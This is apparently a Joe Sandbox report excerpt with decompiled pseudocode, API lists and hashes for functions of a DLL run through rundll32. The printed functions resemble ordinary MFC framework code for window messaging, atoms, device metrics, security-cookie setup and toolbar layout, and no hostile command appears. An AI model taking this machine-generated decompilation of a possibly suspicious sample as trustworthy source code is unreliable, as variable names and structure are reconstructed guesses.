                                                                                                            • Instruction ID: f32dedf2229806a380f5c1e0926675dad0c5831b186d9175a334cabdc35765a6
                                                                                                            • Opcode Fuzzy Hash: 19a7042d3ee7ac9ff937cd3b65bdcc34620a1ee98de378f8268fb43055ccdf2e
                                                                                                            • Instruction Fuzzy Hash: 7931D435C00258BECB25DBA4EC84AFDB7B8FF56250F90421AF456E7151DB30AE85CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100316E6(void* __ecx, unsigned int _a4) {
                                                                                                            				struct HWND__* _t20;
                                                                                                            				void* _t23;
                                                                                                            				void* _t33;
                                                                                                            				void* _t34;
                                                                                                            				struct HWND__* _t35;
                                                                                                            
                                                                                                            				_t34 = __ecx;
                                                                                                            				if((E100202AB(__ecx) & 0x40000000) == 0) {
                                                                                                            					_t33 = E10022AD5(__ecx);
                                                                                                            				} else {
                                                                                                            					_t33 = __ecx;
                                                                                                            				}
                                                                                                            				if((_a4 & 0x0000000c) != 0) {
                                                                                                            					_t23 = E100203CE(_t33);
                                                                                                            					if(( !(_a4 >> 3) & 0x00000001) == 0 || _t23 == 0 || _t33 == _t34) {
                                                                                                            						SendMessageA( *(_t33 + 0x1c), 0x86, 0, 0);
                                                                                                            					} else {
                                                                                                            						 *(_t34 + 0x39) =  *(_t34 + 0x39) | 0x00000002;
                                                                                                            						SendMessageA( *(_t33 + 0x1c), 0x86, 1, 0);
                                                                                                            						 *(_t34 + 0x39) =  *(_t34 + 0x39) & 0x000000fd;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t20 = GetWindow(GetDesktopWindow(), 5);
                                                                                                            				while(1) {
                                                                                                            					_t35 = _t20;
                                                                                                            					if(_t35 == 0) {
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					if(E100310CC( *(_t33 + 0x1c), _t35) != 0) {
                                                                                                            						SendMessageA(_t35, 0x36d, _a4, 0);
                                                                                                            					}
                                                                                                            					_t20 = GetWindow(_t35, 2);
                                                                                                            				}
                                                                                                            				return _t20;
                                                                                                            			}

                                                                                                            APIs
                                                                                                              • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                                                            • SendMessageA.USER32(?,00000086,00000001,00000000), ref: 1003173F
                                                                                                            • SendMessageA.USER32(?,00000086,00000000,00000000), ref: 10031753
                                                                                                            • GetDesktopWindow.USER32 ref: 10031757
                                                                                                            • SendMessageA.USER32(00000000,0000036D,?,00000000), ref: 1003177F
                                                                                                            • GetWindow.USER32(00000000), ref: 10031784
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendWindow$DesktopLong
                                                                                                            • String ID:
                                                                                                            • API String ID: 2272707703-0
                                                                                                            • Opcode ID: 73e2593b8f262eaeb4f4e94dd705a49f5985a06933a3941b6edb2e6593d9f2be
                                                                                                            • Instruction ID: b2d0115702f01622c71e7e90a3c3b5da49a9f5b0f30be2a1795dd18db7154202
                                                                                                            • Opcode Fuzzy Hash: 73e2593b8f262eaeb4f4e94dd705a49f5985a06933a3941b6edb2e6593d9f2be
                                                                                                            • Instruction Fuzzy Hash: AC1106312447156BE333CA219C86FDE7ABAEF4AB91F154114F6409E1D2CF91EC418395
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10031E6F(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, struct HWND__* _a4, unsigned int _a8) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v268;
                                                                                                            				intOrPtr _v272;
                                                                                                            				intOrPtr _t20;
                                                                                                            				int _t24;
                                                                                                            				unsigned int _t45;
                                                                                                            				intOrPtr _t52;
                                                                                                            
                                                                                                            				_t20 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				_v8 = _t20;
                                                                                                            				_v272 = __ecx;
                                                                                                            				_t52 =  *((intOrPtr*)(E100373B5() + 4));
                                                                                                            				if(_t52 != 0 && _a8 != 0) {
                                                                                                            					_t45 = _a8 >> 0x10;
                                                                                                            					if(_t45 != 0) {
                                                                                                            						_t24 =  *(_t52 + 0x8c);
                                                                                                            						if(_a8 == _t24 && _t45 ==  *(_t52 + 0x8e)) {
                                                                                                            							GlobalGetAtomNameA(_t24,  &_v268, 0x103);
                                                                                                            							GlobalAddAtomA( &_v268);
                                                                                                            							GlobalGetAtomNameA(0,  &_v268, 0x103);
                                                                                                            							GlobalAddAtomA( &_v268);
                                                                                                            							SendMessageA(_a4, 0x3e4,  *(_v272 + 0x1c), ( *(_t52 + 0x8e) & 0x0000ffff) << 0x00000010 |  *(_t52 + 0x8c) & 0x0000ffff);
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return E100117AE(0, _v8);
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 10031EDC
                                                                                                            • GlobalAddAtomA.KERNEL32 ref: 10031EEB
                                                                                                            • GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 10031F03
                                                                                                            • GlobalAddAtomA.KERNEL32 ref: 10031F0C
                                                                                                            • SendMessageA.USER32(?,000003E4,?,?), ref: 10031F33
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AtomGlobal$Name$MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1515195355-0
                                                                                                            • Opcode ID: 18f948bbb074b7511017b7146c05a941aef01dbd5fd54326c2498a16bdc2d2e7
                                                                                                            • Instruction ID: 486b4a3070eef5cedf278f6f896eb776bbd2baf7572d0ea587dcdbf0f4b3db2c
                                                                                                            • Opcode Fuzzy Hash: 18f948bbb074b7511017b7146c05a941aef01dbd5fd54326c2498a16bdc2d2e7
                                                                                                            • Instruction Fuzzy Hash: 301130759001189EDB51DB65CC90AEAB3F8FF18740F408455E599DB141DBB4AAC1CF60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 82%
                                                                                                            			E10033E13(intOrPtr* __ecx, int* _a4) {
                                                                                                            				int _v8;
                                                                                                            				int _t12;
                                                                                                            				int _t14;
                                                                                                            				int _t22;
                                                                                                            				int _t32;
                                                                                                            				int* _t36;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_t35 = __ecx;
                                                                                                            				if(__ecx == 0) {
                                                                                                            					_t22 =  *0x1004efa8; // 0x60
                                                                                                            					_t12 =  *0x1004efac; // 0x60
                                                                                                            					goto L6;
                                                                                                            				} else {
                                                                                                            					_t32 = GetMapMode( *(__ecx + 8));
                                                                                                            					if(_t32 >= 7 || _t32 == 1) {
                                                                                                            						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
                                                                                                            						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
                                                                                                            						L6:
                                                                                                            						_t36 = _a4;
                                                                                                            						_v8 = _t12;
                                                                                                            						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
                                                                                                            						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
                                                                                                            						_t36[1] = _t14;
                                                                                                            					} else {
                                                                                                            						_push(3);
                                                                                                            						 *((intOrPtr*)( *__ecx + 0x34))();
                                                                                                            						E10028F83(__ecx, _a4);
                                                                                                            						_push(_t32);
                                                                                                            						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t14;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • GetMapMode.GDI32(?,?,?,?,?,?,1000A1B6,?,00000000,?,742C8B90), ref: 10033E23
                                                                                                            • GetDeviceCaps.GDI32(?,00000058), ref: 10033E5D
                                                                                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 10033E66
                                                                                                              • Part of subcall function 10028F83: MulDiv.KERNEL32(?,00000000,00000000), ref: 10028FC3
                                                                                                              • Part of subcall function 10028F83: MulDiv.KERNEL32(00000000,00000000,00000000), ref: 10028FE0
                                                                                                            • MulDiv.KERNEL32(?,000009EC,00000060), ref: 10033E8A
                                                                                                            • MulDiv.KERNEL32(00000000,000009EC,742C8B90), ref: 10033E95
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsDevice$Mode
                                                                                                            • String ID:
                                                                                                            • API String ID: 696222070-0
                                                                                                            • Opcode ID: bc12bf045409c33661820cc2be5f7907c0cdbee5fcc122a38f5508f39634e8b5
                                                                                                            • Instruction ID: 1735433994fc482824355aeef04517b355e33a0d4513a8ab2ef99d7773c3569a
                                                                                                            • Opcode Fuzzy Hash: bc12bf045409c33661820cc2be5f7907c0cdbee5fcc122a38f5508f39634e8b5
                                                                                                            • Instruction Fuzzy Hash: AA11E135600614EFEB229F65CC84C0EBBEAEF89751B118429F9859B3A1C771ED018F90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 83%
                                                                                                            			E10033EA1(intOrPtr* __ecx, int* _a4) {
                                                                                                            				int _v8;
                                                                                                            				int _t12;
                                                                                                            				int _t14;
                                                                                                            				int _t30;
                                                                                                            				int _t33;
                                                                                                            				int* _t36;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_t35 = __ecx;
                                                                                                            				if(__ecx == 0) {
                                                                                                            					_t30 =  *0x1004efa8; // 0x60
                                                                                                            					_t12 =  *0x1004efac; // 0x60
                                                                                                            					goto L6;
                                                                                                            				} else {
                                                                                                            					_t33 = GetMapMode( *(__ecx + 8));
                                                                                                            					if(_t33 >= 7 || _t33 == 1) {
                                                                                                            						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
                                                                                                            						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
                                                                                                            						L6:
                                                                                                            						_t36 = _a4;
                                                                                                            						_v8 = _t12;
                                                                                                            						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
                                                                                                            						_t10 =  &(_t36[1]); // 0x4689ec45
                                                                                                            						_t14 = MulDiv( *_t10, _v8, 0x9ec);
                                                                                                            						_t36[1] = _t14;
                                                                                                            					} else {
                                                                                                            						_push(3);
                                                                                                            						 *((intOrPtr*)( *__ecx + 0x34))();
                                                                                                            						E10028F1A(__ecx, _a4);
                                                                                                            						_push(_t33);
                                                                                                            						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t14;
                                                                                                            			}










                                                                                                            APIs
                                                                                                            • GetMapMode.GDI32(?,00000000,?,?,?,?,1000A1EA,?), ref: 10033EB1
                                                                                                            • GetDeviceCaps.GDI32(?,00000058), ref: 10033EEB
                                                                                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 10033EF4
                                                                                                              • Part of subcall function 10028F1A: MulDiv.KERNEL32(1000A1EA,00000000,00000000), ref: 10028F5A
                                                                                                              • Part of subcall function 10028F1A: MulDiv.KERNEL32(4689EC45,00000000,00000000), ref: 10028F77
                                                                                                            • MulDiv.KERNEL32(1000A1EA,00000060,000009EC), ref: 10033F18
                                                                                                            • MulDiv.KERNEL32(4689EC45,?,000009EC), ref: 10033F23
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsDevice$Mode
                                                                                                            • String ID:
                                                                                                            • API String ID: 696222070-0
                                                                                                            • Opcode ID: 833bac8d30de56bf327d299826c07e3a3159bd3f9899bf9753b6f554495b0d72
                                                                                                            • Instruction ID: d9f530c2cd1e86ac66058578f4e3f5f9ceac98c77ead6ae7da37ff5c198008ea
                                                                                                            • Opcode Fuzzy Hash: 833bac8d30de56bf327d299826c07e3a3159bd3f9899bf9753b6f554495b0d72
                                                                                                            • Instruction Fuzzy Hash: 6D11C235600614EFE7229F65CC84C0EBBFAEF85752B118429F9859B361C771EC018F90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10016B44() {
                                                                                                            				struct _FILETIME _v12;
                                                                                                            				signed int _v16;
                                                                                                            				union _LARGE_INTEGER _v20;
                                                                                                            				signed int _t7;
                                                                                                            				signed int _t9;
                                                                                                            				signed int _t10;
                                                                                                            				signed int _t11;
                                                                                                            				signed int _t15;
                                                                                                            				signed int _t22;
                                                                                                            
                                                                                                            				_t7 =  *0x1004c470; // 0x6edecb8c
                                                                                                            				if(_t7 == 0 || _t7 == 0xbb40e64e) {
                                                                                                            					GetSystemTimeAsFileTime( &_v12);
                                                                                                            					_t9 = GetCurrentProcessId();
                                                                                                            					_t10 = GetCurrentThreadId();
                                                                                                            					_t11 = GetTickCount();
                                                                                                            					QueryPerformanceCounter( &_v20);
                                                                                                            					_t15 = _v16 ^ _v20.LowPart;
                                                                                                            					_t22 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t9 ^ _t10 ^ _t11 ^ _t15;
                                                                                                            					 *0x1004c470 = _t22;
                                                                                                            					if(_t22 == 0) {
                                                                                                            						 *0x1004c470 = 0xbb40e64e;
                                                                                                            					}
                                                                                                            					return _t15;
                                                                                                            				}
                                                                                                            				return _t7;
                                                                                                            			}













                                                                                                            APIs
                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 10016B5F
                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 10016B6B
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 10016B73
                                                                                                            • GetTickCount.KERNEL32 ref: 10016B7B
                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 10016B87
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                            • String ID:
                                                                                                            • API String ID: 1445889803-0
                                                                                                            • Opcode ID: c4e665b203c20cf87cd8f2106384ef992f2c3d3f5cabc43c5d4d3063469ed334
                                                                                                            • Instruction ID: 11add00fd643567121de8b49d98352c3af742b412758f19a40badcee8712c011
                                                                                                            • Opcode Fuzzy Hash: c4e665b203c20cf87cd8f2106384ef992f2c3d3f5cabc43c5d4d3063469ed334
                                                                                                            • Instruction Fuzzy Hash: 21F0FF72C012289FDB11DBF5CE8899AB7F8FF4E355B820551D841EB111DB30D9419B80
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 63%
                                                                                                            			E1002C1A7(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				intOrPtr* _v24;
                                                                                                            				signed int _v32;
                                                                                                            				struct tagRECT _v48;
                                                                                                            				signed int _v52;
                                                                                                            				signed int _v56;
                                                                                                            				struct tagRECT _v72;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr _t170;
                                                                                                            				signed int _t171;
                                                                                                            				intOrPtr* _t172;
                                                                                                            				signed int _t175;
                                                                                                            				signed int _t177;
                                                                                                            				intOrPtr* _t179;
                                                                                                            				signed char _t183;
                                                                                                            				signed int _t184;
                                                                                                            				signed int _t186;
                                                                                                            				intOrPtr* _t200;
                                                                                                            				intOrPtr* _t204;
                                                                                                            				signed int _t220;
                                                                                                            				intOrPtr* _t223;
                                                                                                            				signed char _t233;
                                                                                                            				signed int _t247;
                                                                                                            				signed int _t249;
                                                                                                            				signed int _t258;
                                                                                                            				signed int _t261;
                                                                                                            				signed int _t266;
                                                                                                            				signed int _t268;
                                                                                                            				intOrPtr _t270;
                                                                                                            				signed int _t273;
                                                                                                            				intOrPtr _t275;
                                                                                                            				signed int _t277;
                                                                                                            				intOrPtr* _t282;
                                                                                                            
                                                                                                            				_t268 = 0;
                                                                                                            				_push(0);
                                                                                                            				_t223 = __ecx;
                                                                                                            				_push(0);
                                                                                                            				_push(0x418);
                                                                                                            				_v16 = 0;
                                                                                                            				_v56 = 0;
                                                                                                            				_v52 = 0;
                                                                                                            				_t277 =  *((intOrPtr*)( *__ecx + 0x110))();
                                                                                                            				_v32 = _t277;
                                                                                                            				if(_t277 != 0) {
                                                                                                            					_t175 = E1001F77E(_t277 + _t277 * 4 << 2);
                                                                                                            					_v16 = _t175;
                                                                                                            					if(_t277 > 0) {
                                                                                                            						_v12 = _t175;
                                                                                                            						do {
                                                                                                            							E1002B71F(_t223, _t268, _v12);
                                                                                                            							_v12 = _v12 + 0x14;
                                                                                                            							_t268 = _t268 + 1;
                                                                                                            						} while (_t268 < _t277);
                                                                                                            						_t270 = _v16;
                                                                                                            						_t177 = 0;
                                                                                                            						if(_t277 > 0) {
                                                                                                            							_t233 =  *(_t223 + 0x7c);
                                                                                                            							if((_t233 & 0x00000002) == 0) {
                                                                                                            								_t266 = _t233 & 0x00000004;
                                                                                                            								_v48.bottom = _t266;
                                                                                                            								if(_t266 == 0) {
                                                                                                            									L19:
                                                                                                            									_push(_t177);
                                                                                                            									asm("sbb eax, eax");
                                                                                                            									_t177 =  ~(_a8 & 0x00000002) & 0x00007fff;
                                                                                                            									__eflags = _t177;
                                                                                                            									goto L20;
                                                                                                            								} else {
                                                                                                            									if((_a8 & 0x00000004) != 0) {
                                                                                                            										L18:
                                                                                                            										_push(_t177);
                                                                                                            										_push( *((intOrPtr*)(_t223 + 0x6c)));
                                                                                                            									} else {
                                                                                                            										if((_a8 & 0x00000008) == 0) {
                                                                                                            											__eflags = _a8 & 0x00000010;
                                                                                                            											if((_a8 & 0x00000010) == 0) {
                                                                                                            												__eflags = _a12 - 0xffffffff;
                                                                                                            												if(_a12 == 0xffffffff) {
                                                                                                            													__eflags = _t233 & 0x00000001;
                                                                                                            													if((_t233 & 0x00000001) == 0) {
                                                                                                            														goto L19;
                                                                                                            													} else {
                                                                                                            														goto L18;
                                                                                                            													}
                                                                                                            												} else {
                                                                                                            													SetRectEmpty( &_v48);
                                                                                                            													 *((intOrPtr*)( *_t223 + 0x13c))( &_v48, _a8 & 0x00000002);
                                                                                                            													_t220 = _a8 & 0x00000020;
                                                                                                            													__eflags = _t220;
                                                                                                            													if(_t220 == 0) {
                                                                                                            														_t258 = _v48.right - _v48.left;
                                                                                                            														__eflags = _t258;
                                                                                                            													} else {
                                                                                                            														_t258 = _v48.bottom - _v48.top;
                                                                                                            													}
                                                                                                            													_push(_t220);
                                                                                                            													_push(_t258 + _a12);
                                                                                                            												}
                                                                                                            											} else {
                                                                                                            												_push(0);
                                                                                                            												L20:
                                                                                                            												_push(_t177);
                                                                                                            											}
                                                                                                            										} else {
                                                                                                            											_push(0);
                                                                                                            											_push(0x7fff);
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            								_push(_t277);
                                                                                                            								_push(_t270);
                                                                                                            								E1002BCF4(_t223, _t266);
                                                                                                            							}
                                                                                                            							_push(_t277);
                                                                                                            							_push(_t270);
                                                                                                            							_push( &(_v48.right));
                                                                                                            							_t179 = E1002BBD2(_t223);
                                                                                                            							_v56 =  *_t179;
                                                                                                            							_v52 =  *((intOrPtr*)(_t179 + 4));
                                                                                                            							if((_a8 & 0x00000040) != 0) {
                                                                                                            								_t261 = 0;
                                                                                                            								_v8 = 0;
                                                                                                            								_a12 = 0;
                                                                                                            								_v48.bottom =  *((intOrPtr*)(_t223 + 0x9c));
                                                                                                            								 *((intOrPtr*)(_t223 + 0x9c)) = 0;
                                                                                                            								if(_t277 > 0) {
                                                                                                            									_t200 = _t270 + 4;
                                                                                                            									_v24 = _t200;
                                                                                                            									_t247 = _t277;
                                                                                                            									do {
                                                                                                            										if(( *(_t200 + 5) & 0x00000001) != 0 &&  *_t200 != 0) {
                                                                                                            											_t261 = _t261 + 1;
                                                                                                            										}
                                                                                                            										_t200 = _t200 + 0x14;
                                                                                                            										_t247 = _t247 - 1;
                                                                                                            									} while (_t247 != 0);
                                                                                                            									_a12 = _t261;
                                                                                                            									if(_t261 > 0) {
                                                                                                            										_t273 = E1001F77E(_t261 + _t261 * 2 << 3);
                                                                                                            										if(_t273 == 0) {
                                                                                                            											_t64 =  &_v8;
                                                                                                            											 *_t64 = _v8 & 0x00000000;
                                                                                                            											__eflags =  *_t64;
                                                                                                            										} else {
                                                                                                            											E1002B8AD(_t273, 0x18, _a12, 0x1002be80);
                                                                                                            											_v8 = _t273;
                                                                                                            										}
                                                                                                            										_a12 = _a12 & 0x00000000;
                                                                                                            										_v12 = _v12 & 0x00000000;
                                                                                                            										_t204 = _v24;
                                                                                                            										_t275 = _v8 + 8;
                                                                                                            										_v20 = _t275;
                                                                                                            										_v24 = _t204;
                                                                                                            										do {
                                                                                                            											if(( *(_t204 + 5) & 0x00000001) != 0 &&  *_t204 != 0) {
                                                                                                            												_t249 = _v12;
                                                                                                            												 *((intOrPtr*)(_t275 - 8)) = _t249;
                                                                                                            												 *((intOrPtr*)(_t275 - 4)) =  *_t204;
                                                                                                            												 *((intOrPtr*)( *_t223 + 0x16c))(_t249,  &_v72);
                                                                                                            												E10028E96(_t223,  &_v72);
                                                                                                            												_a12 = _a12 + 1;
                                                                                                            												_v20 = _v20 + 0x18;
                                                                                                            												_t204 = _v24;
                                                                                                            												asm("movsd");
                                                                                                            												asm("movsd");
                                                                                                            												asm("movsd");
                                                                                                            												asm("movsd");
                                                                                                            												_t277 = _v32;
                                                                                                            												_t275 = _v20;
                                                                                                            											}
                                                                                                            											_v12 = _v12 + 1;
                                                                                                            											_t204 = _t204 + 0x14;
                                                                                                            											_v24 = _t204;
                                                                                                            										} while (_v12 < _t277);
                                                                                                            									}
                                                                                                            								}
                                                                                                            								_t183 =  *(_t223 + 0x7c);
                                                                                                            								if((_t183 & 0x00000001) != 0 && (_t183 & 0x00000004) != 0) {
                                                                                                            									 *((intOrPtr*)(_t223 + 0x6c)) = _v56;
                                                                                                            								}
                                                                                                            								_t271 = 0;
                                                                                                            								_t307 = _t277;
                                                                                                            								if(_t277 > 0) {
                                                                                                            									_v20 = _v16;
                                                                                                            									do {
                                                                                                            										E1002B9F8(_t223, _t223, _t271, _t277, _t307, _t271, _v20);
                                                                                                            										_v20 = _v20 + 0x14;
                                                                                                            										_t271 = _t271 + 1;
                                                                                                            									} while (_t271 < _t277);
                                                                                                            								}
                                                                                                            								_t184 = _a12;
                                                                                                            								if(_t184 > 0) {
                                                                                                            									_t282 = _v8 + 8;
                                                                                                            									_a12 = _t184;
                                                                                                            									do {
                                                                                                            										_t186 = E10020230(_t223,  *((intOrPtr*)(_t282 - 4)));
                                                                                                            										_v32 = _t186;
                                                                                                            										if(_t186 != 0) {
                                                                                                            											GetWindowRect( *(_t186 + 0x1c),  &_v72);
                                                                                                            											_t271 = _v72.left -  *_t282;
                                                                                                            											_v24 = _v72.top -  *((intOrPtr*)(_t282 + 4));
                                                                                                            											 *((intOrPtr*)( *_t223 + 0x16c))( *((intOrPtr*)(_t282 - 8)),  &_v72);
                                                                                                            											E100204FE(_v32, 0, _v72.left + _v72.left -  *_t282, _v24 + _v72.top, 0, 0, 0x15);
                                                                                                            										}
                                                                                                            										_t282 = _t282 + 0x18;
                                                                                                            										_t125 =  &_a12;
                                                                                                            										 *_t125 = _a12 - 1;
                                                                                                            										_t313 =  *_t125;
                                                                                                            									} while ( *_t125 != 0);
                                                                                                            									_push(_v8);
                                                                                                            									L1001F7A9(_t223, _t271, _t282, _t313);
                                                                                                            								}
                                                                                                            								_t270 = _v16;
                                                                                                            								 *((intOrPtr*)(_t223 + 0x9c)) = _v48.bottom;
                                                                                                            							}
                                                                                                            							_push(_t270);
                                                                                                            							L1001F7A9(_t223, _t270, _t277, _t313);
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				SetRectEmpty( &_v72);
                                                                                                            				 *((intOrPtr*)( *_t223 + 0x13c))( &_v72, _a8 & 0x00000002);
                                                                                                            				_v52 = _v52 + _v72.top - _v72.bottom;
                                                                                                            				_v56 = _v56 + _v72.left - _v72.right;
                                                                                                            				E1002F49A( &(_v48.right), _a8 & 0x00000001, _a8 & 0x00000002);
                                                                                                            				_t170 = _v48.right;
                                                                                                            				if(_v56 <= _t170) {
                                                                                                            					_v56 = _t170;
                                                                                                            				}
                                                                                                            				_t171 = _v48.bottom;
                                                                                                            				if(_v52 <= _t171) {
                                                                                                            					_v52 = _t171;
                                                                                                            				}
                                                                                                            				_t172 = _a4;
                                                                                                            				 *_t172 = _v56;
                                                                                                            				 *(_t172 + 4) = _v52;
                                                                                                            				return _t172;
                                                                                                            			}

                                                                                                            0x1002c247
                                                                                                            0x1002c2a8
                                                                                                            0x1002c2a8
                                                                                                            0x1002c2a8
                                                                                                            0x1002c239
                                                                                                            0x1002c239
                                                                                                            0x1002c23a
                                                                                                            0x1002c23a
                                                                                                            0x1002c237
                                                                                                            0x1002c231
                                                                                                            0x1002c2a9
                                                                                                            0x1002c2ac
                                                                                                            0x1002c2ad
                                                                                                            0x1002c2ad
                                                                                                            0x1002c2b2
                                                                                                            0x1002c2b3
                                                                                                            0x1002c2b7
                                                                                                            0x1002c2ba
                                                                                                            0x1002c2c8
                                                                                                            0x1002c2cb
                                                                                                            0x1002c2ce
                                                                                                            0x1002c2da
                                                                                                            0x1002c2de
                                                                                                            0x1002c2e1
                                                                                                            0x1002c2e4
                                                                                                            0x1002c2e7
                                                                                                            0x1002c2ed
                                                                                                            0x1002c2f3
                                                                                                            0x1002c2f6
                                                                                                            0x1002c2f9
                                                                                                            0x1002c2fb
                                                                                                            0x1002c2ff
                                                                                                            0x1002c306
                                                                                                            0x1002c306
                                                                                                            0x1002c307
                                                                                                            0x1002c30a
                                                                                                            0x1002c30a
                                                                                                            0x1002c30f
                                                                                                            0x1002c312
                                                                                                            0x1002c324
                                                                                                            0x1002c329
                                                                                                            0x1002c340
